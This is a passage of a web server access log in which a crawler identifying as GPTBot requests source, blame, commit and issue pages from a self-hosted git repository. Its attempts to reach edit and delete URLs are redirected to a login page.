"https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 11198] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:19:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36414] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:19:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode%2fquery.json" [Client 74.7.227.38] [Length 24929] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14282] [Gzip 8.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:49:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 39905] [Gzip 25.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 48601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 25093] [Gzip 19.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:49:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:49:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:19:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11625] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:50:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:50:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:50:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:19:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11597] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33319] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33316] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33276] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33316] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33321] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26535] [Gzip 6.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:19:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11608] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:50:15 